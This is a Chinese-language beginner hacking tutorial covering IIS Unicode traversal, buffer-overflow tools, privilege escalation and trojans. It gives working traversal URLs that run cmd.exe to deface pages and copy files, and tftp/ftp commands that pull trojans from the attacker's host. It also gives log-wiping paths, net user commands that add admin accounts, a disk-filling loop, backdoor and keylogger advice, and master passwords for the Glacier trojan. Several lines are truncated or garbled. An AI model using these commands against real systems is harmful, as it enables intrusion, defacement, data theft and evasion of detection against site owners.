稍微设置一下就上路吧！过了一会，呵呵，报告出来了，快看，哇！漏洞一大堆！这下赚了！各条漏洞都有详细的信息，大家看吧，总比我说的准了。

现在这台主机已经和我们成为亲戚了，要让这位亲爱的亲戚做点事，就要开始各种攻击了，下回我们就探讨一下最最可爱的unicode漏洞，各位可能就会在unicode中完成第一次黑客体验，再见：）

 

(本章完)

[(第6章 黑客初级技术讲解（下续二）)]

基础知识（2）

今天我们谈谈unicode漏洞，这可是基础中的基础，重点里的重点，不懂的一定要好好学。

2000年10月17日中联绿盟发布了以下的安全公告：

微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞

远程漏洞：是

本地漏洞：是

发布日期：2000年10月17日

更新日期：2000年10月17日

受影响的版本：

Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 – Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 – Microsoft Windows NT 4.0

这可是中国乃至全球网络安全界的一次大变节，入侵nt/2000系统变得如此简单，不打补丁的死路一条。

下面开始正式学习：

一，UNICODE漏洞的原理

此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1， 中国台湾繁体中文也同样存在这样的漏洞。

中文版的WIN2000中，UNICODE编码 存在BUG，在UNICODE 编码中

%c1%1c -〉 （0xc1 – 0xc0） * 0x40 + 0x1c = 0x5c = ’/’

%c0%2f -〉 （0xc0 – 0xc0） * 0x40 + 0x2f = 0x2f = ’\’

在NT4中/编码为%c1%9c

在英文版里： WIN2000英文版%c0%af

在中文win2k里：%c1%1c

此外还有多种编码，不一一阐述。

本文例子均以win2k为准，其他类型请自行替换。

基础知识（3）

二，一切从基础开始

由于winnt\system32\cmd.exe的存在，使远程执行命令变为可能，在浏览器里输入以下请求：（假设11.11.22.22有漏洞）

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下，如果inetpub\目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。

如果成功，那么在浏览区可看到如下信息：

Directory of C:\inetpub\scripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. （假设目录中没有文件，实际上有一大堆）

是不是有自己机器的感觉了，正点！就是这种感觉！

cmd.exe相当与dos里的command.com，因此，我们可以执行很多命令了！

http://11.11.22.22/msadc/..%c1%1 … em32/cmd.exe?/c+dir （这个命令同样道理）

大家请注意：/c后面的+，实际上，他就是空格，请记牢！dir开始就是dos命令了，我们可以更改一下：

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

会dos的朋友一定懂其意义了，不懂的请去看书 .

不用说，大家也知道我们就可以利用它来对有漏洞的机器展开攻击了！

三，实战演练

1，修改主页！（是不是很爽？）

一般主页位置在c:\inetpub\wwwroot下，但要是改了路径，就需要找找了。

最方便的方法：在浏览器里输入 http://11.11.22.22/.ida要是有漏洞，那在浏?..皇俏颐堑氖籽　?/a>

分析法：用dir看各个盘符的根目录，看可疑的就进去看，运气好的在一分钟里找到，这要看运气和直觉。

dir/s法：首先在看其主页，找个图片或连接，看它的文件名，比如，11.11.22.22首页上有一幅图片，右击，属性，看到了吗？iloveu.gif，然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif，注意实际应用时别忘了把空格改为+,如果没有继续找d盘，很快就能确定主页目录的。

找到了目录，就要对它开刀了！一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个，现在我们确定11.11.22.22中为index.htm

那么我们就修改它吧！

最方便的方法：echo法。echo是一个系统命令，主要用于设置回应开关，而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容，echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容，这样我们就可以逍遥的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

回应为：HTTP 500 – 内部服务器错误

通过对cmd的分析，袁哥得出一条简便的方法，加入符号

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

回应为：cgi错误，不用理会

两条命令一下，呵呵，再看看11.11.22.22，是不是烙上我们的大名了？不错吧

而在实际操作中，可能袁哥的方法也会失效，这时，我们就可以copy cmd.exe 为另一个exe，记住路径，用copy后的来echo

例如：11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

2,上传法：echo有点不讲道理，把人家的文件破坏了，要是想在主页上增光添彩，那就应该用改好的主页

(本章完)

[(第7章 黑客初级技术讲解（下续三）)]

基础知识（3）

上传，这个我们后面介绍。

几点忠告：

1，对于没有主页的机器（就是正在建立的主页），不要改它，这很没水准，也很没道德

2，echo前记得帮他们做好备份

3，不准在主页里加入恶性语句

2，下载文件

要是有什么有用的文件被你发现，那我们如何下载呢？

最简单的方法：把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后，下载11.11.22.22/baby.zip就行了，注意！实际应用中要记得对文件名进行修改，总之不能暴露。

别的方法：对不起，没想好：）

3，最重要的上传

一般方法：ftp法

首先建一个ftp脚本文件：c:\hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧

echo+open ftp.cshu.com（ftp主机） > c:\hehe.haha

echo+user yourname >> cc:\hehe.haha （yourname是用户名）

echo+yourpasswd >> c:\hehe.haha （yourpasswd是密码）

echo+get setup.exe >> c:\hehe.haha 要下载的文件

echo+quit >> c:\hehe.haha

完了以后：ftp+/s:c:\hehe.haha,由于是ftp主机，那么速度一定很快，过一会setup.exe就会出现在当前目录了（也就是cmd所在目录）

别忘了先上传到ftp主机，不要做马大哈哦！

最简单的方法：tftp法。

这种方法不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，利用漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件）

在这里我推荐cisco tftp server，自己去找找把，实在没有来找我：）

安装好后运行，别忘了设置好默认目录，否则会找不到文件

tftp命令：tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe（ihateu.exe在默认目录里）

1.2.3.4为你的ip，用unicode运行一下，会看到tftp server里有反应了，这就好了，不一会，文件就传上去了，方便把！

学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行…………（运行程序和在dos里一样）

4，如何清除痕迹

虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。用cleaniislog行不通，就…………直接删吧！

C:\winnt\system32\logfiles\*.*

C:\winnt\ssytem32\config\*.evt

C:\winnt\system32\dtclog\*.*

C:\winnt\system32\*.log

C:\winnt\system32\*.txt

C:\winnt\*.txt

C:\winnt\*.log

全……擦掉！

四，细节问题。

1，遇到长文件名怎么办？

c:\program files\

就用c:\program20%files\

2，遇到空格怎么办？

%代替喽，或者xx yy=xxyy~1

基础知识（5）

%代替喽，或者xx yy=xxyy~1

3,如何做个很大的文件？

目的就是破坏啦！我不喜欢不过教教你们啦

@echo off

echo big > c:\a.a

:h

copy c:\a.a+c:\a.a c:\a.a

goto h

注意不要乱来啊！

4，输入命令，没反应或反应不对。

：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！看在你看到这里那么给我面子的份上，在给你几个吧！

http://www.exsample.com/scripts/ … macr;..À

¯../winnt/system32/cmd.exe?/c+dir+c :\ 或 http://www.exsample.com/msadc/.. … 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_vti_bin … 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_mem_bin … 2/cmd.exe?/c+dir+c:\

不一定有用哦！

5，如何找到unicode漏洞的主机

呵呵：）最好的方法自然是………………一个一个ping,一个一个试喽：）

不要打我呀！我说我说。最好找一个cgi扫描器，unicode查找器多如牛毛，随便找个吧！

6，我copy，del文件，怎么显示aceess denined?

这个不好办了，由于unicode所拥有的权限有限，出现上述情况很正常，我们要做的便是提高自己的权限！

这个我会在今后介绍，现在你可以试试attrib

attrib -r -h -s c:\autoexec.bat

再对autoexec.bat进行操作，看看有没有效果，成功率不高，不好意思！

7，我黑了主页，天下无敌？

我本来想对你说：”见你的鬼去吧！”不过想想不大礼貌，有失我绅士风度，所以改个口

echo主页或改主页在不懂黑客的人看起来很了不起，不过，它最多算是一个基础，拿到admin才是我们的终极目标！

对cshu全体成员来说，不准去改正在建立的网页！这是我们的原则！

要是你想耍耍威风，那也可以理解，那就去黑外国的，或者url欺骗也是个好选择

8，我如何做更多的事？

第一，努力提高权限

第二，由于cmd的限制，我们可以做的不多，那就要程序帮忙，上传吧！切记，要隐秘！

一，frontpage扩展攻击。

为什么把它放第一位呢？原因很简单，它最最方便，frontpage服务器扩展是一种方便的远程站点管理功能，可是由于某些网管注意文明用语的疏忽（为什么注意文明用语满街飞？）不设置访问密码，如果那样的话，我们只要用一个frontpage就可以黑它了！！这完全不是黑客工具，但它确实办到了，还要感谢注意文明用语网管和微软啊！

具体做法：

1，准备frontpage，我是用dreamweaver的，但它不能黑啊：）最好是2000版，只是不要是老掉牙的版本就行了。

2，找一台有frontpage扩展的主机，可以用流光，也可以用搜索引擎查找/_vti_pvt/，这是frontpage扩展的标志。

3，接下来打开frontpage,（妈妈：你在干什么？回答：做网页！妈妈：好孩子！）文件菜单下选择”打开站点”，然后在文件夹框里写入 http://11.11.22.22（我习惯用这个做例子，以…僮魍澄募恕?/a>

4，万一跳出错误信息，表示有密码（这个不算注意文明用语）这时我们试着用以下url, http://11.11.22.22/_vti_pvt/service.pwd,这…盎箍梢愿耐场?/a>

我的看法：

这个漏洞只能说明网管的疏忽，对我们而言是没有什么利用价值的，只可以改改网页，也许这也够了，但要进一步控制主机，此漏洞就无能为力。消遣时可以玩玩。

(本章完)

[(第8章 iis溢出攻击)]

二，iis.printer溢出攻击

据说缓冲区溢出攻击是黑客入侵时70%所选的方法，看起来有点夸张，但确实有道理，因为暴力密码破解在网络上变得非常之慢，而像unicode的解码漏洞所取得的权限又太低，而缓冲区溢出一般可取得system权限，是非常有用的！

具体原理我也不是很清楚，只能说个大概：当我们向系统发出超出缓冲区大小的数据处理请求时，便会引发溢出，并弹出错误对话框，我们常看到的”非法操作”其实也是可能是由于溢出。而当溢出时，eip发生错误，有汇编知识的朋友应该记得，eip是控制执行代码的位置（顺便问一下，有没有会crack的高人，记得做我老师）这时加入一段恶性代码，算好发生溢出时的eip值，这样溢出时就会执行恶性代码而不是当掉。非法操作我们知道多的不得了，因此……溢出攻击是非常强大的！

由于汇编对于我们来说较难掌握，加之对溢出的了解很有限，那么我们只能借助高手们的程序来黑了。

具体方法：

1，准备iishack，本站有下载，该版本可以对多种系统进行攻击。

2，用x-scan或流光扫描一个有iis.printer漏洞的主机，然后就可以攻击了。

3，在命令行方式执行iis5hack （主机ip） （端口号，默认80）（系统代号，具体可参考程序的说明） （ shell口）

例如：iis5hack 11.11.22.22 80 1 111（以为在111端口开一个shell）

4,用nc或telnet连上，nc/telnet 11.11.22.22 111,成功的话就可以控制机器了，加个用户，做个代理……

我的看法：

这算是一个比较有用的漏洞了，它能帮助我们取得system权限，其实和admin差不了多少了，对于做一台跳板是非常有利的，希望大家熟练掌握。

三，idq/ida漏洞溢出攻击

这是时下很热门的了，原理和上面的printer相似，目前我只找到了iis5的攻击程序，在cshu里也可以找到的，我们准备的是snake的gui版本，很方便的。

具体方法：

1，准备snakeiis溢出程序。可以从本站下载。

2，ida/idq漏洞很多的，但win2k的服务器就不是那么普遍了，所以用你熟练的扫描器去找一打win2k的机器吧。

3，程序的界面是很傻瓜的，把ip填入，选择好类型，按下溢出按钮，显示shellcode发送完毕。

4，telnet/nc到你设定好的端口，如果成功的话，会显示目录下的信息（因为默认shellcode是dir）

5，欢呼吧！再次溢出，别忘了改shellcode为你想要的代码哦。

6，重复4，很快一台新鲜的win2k被你控制了！

我的看法：

我很喜欢用这种攻击，因为win2k的3389可以很方便的为我做事，省力地搞到一台win2k，然后慢慢享用，爽到根尖细胞啊！大家应该掌握这项方法。

四，*bsd telnetd溢出攻击

又是溢出，不过这个可是真正的热点哦，最近红盟等大型安全网站被黑就是因为这个！所以看看吧

具体方法：

1，使用fbsdhack for win2k来攻击，本站有下载的

2，还是要找到这样的主机，一般是xnix的，比较少的，用专门的扫描器吧，我会在不久放出来。

3，等吧！这个漏洞要发送的信息很大，大约16mb,可怕吧，所以最好用高速肉鸡

4，有幸成功了，记得请我吃饭！

我的看法：

这个漏洞的利用比较有难度，从找机器开始就是。但作为黑客爱好者，我们没有理由去回避它！

五，密码暴力破解

这是最最原始，也是最最基本的攻击的方式了，利用字典文件或暴力模式，对密码进行探测。费时费力，但若有经验的话，可以缩短这一过程。

具体方法：

1，找一个破解器，有ftp,http,smtp,pop3,telnet等等类型。

2，找到一台相应的主机。

3，设定一番，上路吧！你可以睡觉，可以去machine（就是做作业），可以去泡妞……就是不要傻等。为什么呢？因为会伤视力的：）怎么倒了一片，起来起来！

4，万一成功了（之所以用这个词，是因为成功率很低的）表明你运气旺，赶紧下线，买彩票去吧

大家好，这几天被cgi程序搞得头昏脑胀，主要还是51的错，什么破东西，那么多错误！现在只好暂时借人家的地方用。

这是菜鸟操的最后第二节，说实话我还可以写很多的，但是作业还欠了一大堆：（为什么我没有满舟的**运？算了算了，我不合那种欺世盗名之辈一般见识，开始做操吧！

不知道大家对unicode和溢出攻击是不是熟练了？没有的要加油哦！今天我们来谈谈权限的提升。

在windows系统中，最高的权限掌握在administrators的手里，在xnix中称为root,我们要完全掌握一台机器，拿到admin是不可或缺的。

首先说说最简单的:system to admin

当我们用溢出攻击成功后，其实我们已经拿到了system权限（具体看每种攻击而可能有所不同）这时我们很容易拿到admin权限。首先看看一下命令：

net user 察看用户表 net user username pass /add（添加密码为pass的用户username）

net localgroup 察看组 net localgroup guests cshu /add 把cshu用户加入guests组

net use \\ip\ipc$ password /user:username 这是远程连接的命令

假如我们溢出了11.11.22.22，那么这样做吧！

net user （看到了iusr_machinename的用户了，它一般没什么权限的）

 

(本章完)

[(第9章 黑客初级教程（下）)]

基础知识（4）

net user iusr_machinename cshu （把它的密码设为cshu）

net localgroup administrators iusr_machinename /add（加入administrators组）

这样我们就拥有了iusr_machinename这一账号，admin权限，简单吧！

熟悉一下net use 命令：

net use \\11.11.22.22\ipc$ cshu /user:iusr_machinename 建立连接

copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 复制到机器c:\winnt\system32上，若是c$.d$,就表示c,d盘

net time \\11.11.22.22 看到了时间了，比如是8点

at \\11.11.22.22 8:03 haha.exe 就会在8点3分执行。

net use \\11.11.22.22 /delete 断开连接

应该是很简单的。这样我们就可以随心所欲地操作11.11.22.22了，admin是最高权限，所以没有限制的：）

是不是很简单？所以我是溢出是很厉害的攻击方法。

3389知道吧！如果能进入，那么用上面的命令也可以轻易拿到admin的，不过呢，有3389漏洞的机器已经不多了。看你运气了！（本站有几篇关于3389的好文章）

总的来说，还是unicode的机器最多，为什么注意文明用语网管不会灭绝呢：）虽然unicode拿admin有一定难度，但还是要试试的。

首先，我们检查一下unicode在这台机器上的权限，一般看读写权限和运行权限。用copy 或del命令便可确定读写权限，然后上传文件运行一下便可知道运行权限。

1，如果我们可以对winnt\repair和winnt\config进行访问，sam文件就在里面（win2k里是sam，nt4里是sam._）那么用tftp 把get改成put下载下来，或者把它复制到inetpub\wwwroot下，改成zip下载。

拿到sam后，用lc3破解版暴力破解吧，这种方法比较费时。

2，要是有运行权限，拿就抛个木马上去吧！虽说木马可能也会没有权限，但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是，最好放最新的木马，因为木马很容易被杀毒软件查杀！

3，其实和2差不多，只不过变成了键盘记录器，选个国产的，一般杀毒软件不会杀出来，认真配置好后传上去，下线睡觉或是做家务去！等到网管用了机器，密码就会被纪录下来，我们在去取，admin就顺利到手了：）

4，getadmin和pipeupadmin，前者是nt4用的，后者是2000。看看帮助知道使用方法后（其实猜都猜得到）就可以提升一个用户的权限，有一步登天的感觉！

5，手工做个bat文件，里面是建立用户等命令，然后把它放到自启动下，有很多途径：documents and settings下的开始菜单下的启动，知道了吧，至于要顺利放进去的话，会遇到空格长名等等问题，就看你的基本功了。win.ini里有load，加进去。还有便是注册表，好好研究一下regedit.

6，本地溢出。这个比较高深，我能告诉大家的只是，去四处找找本地溢出程序。

总的来说，unicode改主页是非常简单的，但是若是要取得更高的权限，就要一番努力，上面的方法只是些思路，实际操作时需要具体处理，开动脑筋，把方法都结合起来。（是不是听起来有点玄？）

想想好像没有什么其他的途径要说了，什么？linux,呵呵，我还不大懂，就不在这里瞎说了。

那今天就说到这里了，6里面我会说说后门制作，小问题和我的一点经验。期待吧！

这是最后一节了，写的傻傻的，但我毕竟坚持下来了，值得鼓励！（偶尔阿q一下）在写菜鸟操的同时，我们的cshu（cshu.51.net）也在默默成长，但现在我要准备离开了，真是有点舍不得。在今后的日子里，还请大家多多支持cshu和christ,**他们。

今天说点什么呢？没有主题，乱谈一通吧！

首先我要吐一次血，当然是为了推荐一样东西，就是流光！（那么没创意，老土！）不管怎么说，小榕的流光应该是中国第一黑软，他综合了诸多的攻击手段，使攻击便捷化，当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。

我来说说我自己觉得最有用的几个项目：

1，探测—-扫描pop3/ftp/nt/sql主机，要是无目的地黑，那么用这个再合适不过了。进去后填好ip范围（范围可以扫大一点，它很快的），至于类型嘛，要是你要一大堆unicode，那么选择iis/frontpage再合适不过了，要是要更高的权限，sql是不错的选择。完成后，表格里会多出一大堆东西。

remote execute-x 这是几种不同的unicode，用它比用ie来执行方便多了，但是echo有问题（是我自己不会，会的朋友快教我）

remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件，要使用的话，你首先要有一个ftp账号，去申请吧！顺利拿到cif文件后，用流光自带的工具就可以解开密码，很爽的！

remote ftp sam -x 拿sam的，还是用最好的lc3来解吧！

frontpage extended 这是frontpage扩展，不过不要高兴，是要密码的。但是若是后面跟了privilege hole的话，放声大笑吧！（小心不要让邻居拿着菜刀冲进来）打开frontpage，打开站点， http://ip就可以了！（http://不要忘）

此外还有一点变通，大家肯定读的懂的。

2，探测—-高级扫描工具。这可是流光4中的重头戏，综合了很多漏洞，还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测，很快扫出漏洞后，流光会生成一个报告文件，其中包含漏洞的连接，要是你看不懂的话，建议你拿出x-scan，里面有漏洞描述的。

3，工具—-nt管道远程命令，种植者，这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号，相信在此之前你应该有几个了吧，那就快点试试吧！

总的来说，流光的使用是非常简单的，其中也有不少工具值得我们一用，tools目录里有一些很好的工具，exploit里则有很多溢出攻击程序，前提是你应该会c,不会的话我也没办法，学会c起码要看10倍于菜鸟操的资料吧！另外给大家推荐一个站点：www.hack.co.za，有什么漏洞的话就去那里找找，你会有所收获的。

然后我想说说一些黑站的经验。

☆当我们用unicode控制一台机器时，我向大家推荐用asp木马，阿新的改良版，本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息，最好也放一个cmd.asp上去，运气好的话，可以运行命令的。

上传好后，ie里输入其中index.asp的地址，呵呵，我们就能方便地管理其中的文件了，可以改网页，改代码，上传脚本文件麻烦？那就用它来生成吧！

推荐他的最大原因便是—-便于隐藏！一般网站总有一个庞大的目录，选择一个深的，放进去，网管很难发现的：）

最后对大家说一句，要是有备份目录（很多网站都有的），最好也放一份进去。有一次我用这个东西修改一家网站的首页，改了两三次网管也没删掉，可是突然一天不行了，原来他用了备份的网页（还算机灵吧）

☆我想对大家说，对于国内网站，最好不要恶意去攻击，因为我们是中国人嘛！在5/1期间，我发现有一些国内站点被黑，留下的页面上不是poison box，而是中国人的话，这真是无耻到了极点！！！！大家千万不要学哦。还有，现在网上有很多还没有网页的主机，往往有很多漏洞，对于这种机器，竟有一些小人也会去改收页（比如上海那个姓杨的小子）这算什么？显示实力，炫耀技术？呵呵，见鬼去吧！

我的建议是，不要改它的首页，而是努力去拿admin,控制它，这样我们有很多选择：肉鸡，等它有正式主页后可以黑，或者把我们的主页放上去！比申请好多了，权限又足！当然很危险：）这样做是不是有品位多了？

☆要是我们拿到了admin，但有时却不能执行一些命令，那很可能是因为服务启动的问题。试着用以下命令：

net start termservice 启动win2k的终端控制

net start workstation 打开net use 功能

net start lanmanserver 打开ipc

net start eventlog 启动日志（你不会那么傻吧！stop）

net start schedule 打开计划（at）

net start server 共享

还有很多，net命令里去找吧！

☆打开telnet

1，远程去运行ntlm.exe，流光里有

2，net stop telnet

3, net start telnet

☆我推荐几种后门：winshell（默认端口5277）相对于srv，它好一些。remotenc这个是榕哥的作品，可以以指定用户执行，还可以自己起服务的名字，很棒的！

至于服务的名字，建议大家去看看win2k的进程名，学着起相类似的名字，要做到使网管看到了也不会引起警觉，或是有警觉也不敢去删，呵呵，这样就最好了！

☆代理问题。我推荐大家自己去做代理，控制了一台机器后，用snake前辈写的skserver去做个sock5。

具体做法就不详细说了，因为比较普通，只要熟悉一下用法就可以了。

做好了sock5，我们可以上oicq，下棋都用它，sock5代理可是很少见的哦！

要是实在拿不到sock5,用http也可以，这里推荐一个软件tcp2http，它具有很多功能。在给个站点：dzc.126.com国内最最好的的代理站点，怕死的朋友千万不要错过。

最后说说一些对于菜鸟同志的建议：

不要把黑当作一种显示自己的行为，要是你想耍威风，用url欺骗来骗mm最合适了，还可以弄个yahoo什么的……

不要在一项技术上停留过长时间，当你熟练掌握后，应该迅速学习下一个新技术。

不要和被你黑的网管过多接触，前车之鉴哦。

对于一台好机器要做好后门，不要轻易失去它。

想好好学黑客的话，就常去各大论坛转转，仔细读教程，忘记聊天室和网络游戏吧！

实践是最好的教程，再次重申！

应该多学计算机的其他方面的知识，任何知识在一定场合都是有用的。

编程技术……好像太难了，不过再难也要学。

想不出来了………………

好了，我们的菜鸟操终于结束了，我这个大菜鸟也可以退休了，拼搏一年后我会回来的。第一节里我曾许诺让大家学会黑站，不知道大家是否成功了，不管这么样，我们都该不断的努力学习，不是吗?

 

(本章完)

[(第10章 黑客常用兵器之木马篇（上）)]

“我知道远程控制是种武器，在十八般兵器中名列第七，木马呢?”

　　”木马也是种武器，也是远程控制。”

　　”既然是远程控制，为什么要叫做木马？”

　　”因为这个远程控制，无论控制了什么都会造成离别。如果它钩住你的E-Mail，你的E-Mail就要和你离别；如果它钩住你的QQ，你的QQ就要和你离别。”

　　”如果它钩住我的机器，我就和整个网络离别了?”

　　”是的。”

　　”你为什么要用如此残酷的武器?”

　　”因为我不愿被人强迫与我所爱的人离别。”

　　”我明白你的意思了。”

　　”你真的明白?”

　　”你用木马，只不过为了要相聚。”

　　”是的。”

　　一

　　在众多的黑客武器中特洛伊木马（Trojan horse）这种攻击性武器无论是菜鸟级的黑客爱好，还时研究网络安全的高手，都视为最爱。虽然有的时候高手将木马视为卑鄙的手段。但是作为最为有效的攻击工具，木马的威力要比其他的黑客工具大得多。

　　”木马既然如此有效，为何在Hacker兵器谱中排名靠后？”

　　”因为使用木马往往不是很光明正大。”

　　”哦？为何？”

　　”在使用木马的人群中菜鸟黑客居多，他们往往接触网络不久，对黑客技术很感兴趣，很想向众人和朋友显示一番，但是去驾驭技术不高，不能采取别的方法攻击。于是木马这种半自动的傻瓜式且非常有效的攻击软件成为了他们的最爱。而且随着国产化的木马不断的出现，多数黑客的入门攻击几乎无一例外都是使用木马。当然对于那些黑客老手来说他们也并不是不使用木马了，他们通常会在得到一个服务器权限的时候植入自己编写的木马，以便将来随时方便进出这台服务器。”

　　”但如此一来木马的名声不就随之降低了吗？”

　　”是的，所以现在的黑客高手都耻于用木马，更耻于黑个人的计算机。”

　　”不过木马在很多人的眼中仍然是一等一的绝好兵器。”

在众多的木马之中Cult of Dead Cow开发的Back Orific2000应该算是名气比较大的一个。这款软件是在Back Orific2.1的基础之上开发的，但是他最大的改动就是增加了对Windows NT服务器系列的支持。作为微软的高端产品，BO2000的这个功能无疑对Windows NT来说是致命的，就Windows NT本身而言，由于硬盘采取了NTSF的加密，普通的木马，包括冰河也无法控制，当然要想要让多数木马无法对Windows NT发挥作用最好将Windows NT**为NTSF的格式下才会比较好用一些。

　　而正因为如此BO2000才深得黑客高手的喜爱，因为他们感兴趣的也只有服务器，也只有Web Server才能够提起他们的胃口，那是一种来自深层感官的刺激。

　　通常情况下木马大致可分为两个部分：服务器端程序和客户端程序。服务器端通常就是被控制端，也是我们传统概念上的木马了。

　　二

　　”你说BO2000好，但是绝大多数的杀毒招数都能够沟将其制服，而且我感觉他在使用上不如我手里的冰河锐利，况且我也不想黑什么服务器。我认为，个人电脑中隐藏有更大的宝藏，而且个人电脑脆弱的我能够利用任何一种方法摧毁它。

　　”你说的很对，冰河确实锐利，而且称霸中华江湖一年之久，也可谓武林中少见的好兵刃，但是兵器虽然锋利，但兵器在打造的时候却留下来一个致命的缺点，这也是木马冰河为何在武林衰败的原因。”

　　”这是一个什么样的弱点那？竟然如此致命？”

　　”呵呵，说白了也很简单，冰河的作者在打造冰河2.X版本时就给它留下了一个后门，这个后门其实就是一个万能密码，只要拥有此密码，即便你中的冰河加了密码保护，到时候仍然行同虚设。”

　　”什么！真有此事？想我许多朋友还因为冰河好用把它当作了一个免费的远程控制程序来用，如此这般，他们的机子岂不暴露无遗？”

　　”呵呵，在黑客中瞒天过海、借花献佛这些阴险的招数都不算什么，多数木马软件的作者为了扩大自己的势力范围和争取主动权都会留一手，致命的一招。冰河的作者当然也不例外，而且由于作者钟爱许美静，所以每一个冰河中都包含许美静的歌词。当然作者为自己以后行事方便也留了几个万能密码。”

　　”噢？万能密码？”

　　”通常黑客在植入冰河这种木马的时候，为了维护自己的领地通常的要为自己的猎物加一个密码，只有输入正确的密码你才能够正常的控制对方的计算机，但是冰河的打造者为了方便自己的使用在冰河中加入了一个万能的密码，就像万能钥匙一样。冰河各版本的通用密码：

　　2.2版：Can you speak Chinese?

　　2.2版：05181977

　　3.0版：yzkzero!

　　4.0版：05181977

　　3.0版：yzkzero.51.net

　　3.0版：yzkzero!

　　3.1-netbug版密码: 123456!@

　　2.2杀手专版：05181977

　　2.2杀手专版：dzq20000!

你可以试试看，是不是很轻松的就能够进入任何一台有冰河服务器端的电脑？”

　　”真的进入了，果然有此事情，怪不得现在很多人都不再使用冰河。”

　　”此外冰河还存在着两个严重的漏洞：

　　漏洞一：不需要密码远程运行本地文件漏洞。

　　具体的操作方法如下：我们选择使用相应的冰河客户端，2.2版以上服务端用2.2版客户端，1.2版服务端需要使用1.2版客户端控制。打开客户端程序G_Client，进入文件管理器，展开”我的电脑”选中任一个本地文件按右键弹出选择菜单，选择”远程打开”这时会报告口令错误，但是文件一样能上传并运行。

　　任何人都可以利用这个漏洞上传一个冰河服务端就可以轻松获得机器的生死权限了，如果你高兴的话，还可以上传病毒和其它的木马。

　　漏洞二：不需要密码就能用发送信息命令发送信息，不是用冰河信使，而是用控制类命令的发发送信息命令。”

　　”当然这的确是一个原因，但更主要的是现在的多数杀毒软件都能克制冰河。”

　　三

　　木马通常会在三个地方做手脚：注册表、win.ini、system.ini。这三个文件都是电脑启动的时候需要加载到系统的重要文件，绝大部分木马使用这三种方式进行随机启动。当然也有利用捆绑软件方式启动的木马，木马phAse 1.0版本和NetBus 1.53版本就可以以捆绑方式装到目标电脑上，可以捆绑到启动程序上，也可以捆绑到一般程序的常用程序上。如果木马捆绑到一般的程序上，启动是不确定的，这要看目标电脑主人了，如果他不运行，木马就不会进入内存。捆绑方式是一种手动的安装方式，一般捆绑的是非自动方式启动的木马。非捆绑方式的木马因为会在注册表等位置留下痕迹，所以，很容易被发现，而捆绑木马可以由黑客自己确定捆绑方式、捆绑位置、捆绑程序等，位置的多变使木马有很强的隐蔽性。

　　”在众多木马中，大多数都会将自己隐藏在Windows系统下面，通常为C:\Windows\目录或者C:\Windows\system\与C:\Windows\system32下隐藏。”

　　”众多的目录中为何选择这两个目录？”

　　”呵呵，当然是为了便于隐蔽。通常这几个目录为计算机的系统目录，其中的文件数量多而繁杂，很不容易辨别哪些是良性程序哪些是恶性程序，即便高手往往也会有失误删除的情况。而且，即便放置在系统目录下，就多数为重要的文件，这些文件的误删除往往会直接导致系统严重的瘫痪。”

　　”原来如此。”

　　”前辈，木马冰河是否也做了这些手脚？”

　　”这是自然，木马一旦被植入目标计算机中要做的最重要的事就是如何在每次用户启动时自动装载服务端。冰河也是如此了。首先，冰河会在你的注册表中的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run和RUNSERVICE 键值中加上了\kernl32.exe（是系统目录），

　　§c:\改动前的RUN下

　　默认=

　　§c:\改动后的RUN下

　　默认=C:\\WINDOWS\\SYSTEM\\Kernel32.exe

　　§c:\改动前RunServices下

　　默认=

　　§c:\改动后RunServices下

　　默认=C:\\WINDOWS\\SYSTEM\\Kernel32.exe

　　§c:\改动前[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的：

　　默认=Notepad.exe %1

　　§c:\改动后[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的：

　　默认=C:\\WINDOWS\\SYSTEM\\Sy**plr.exe %1

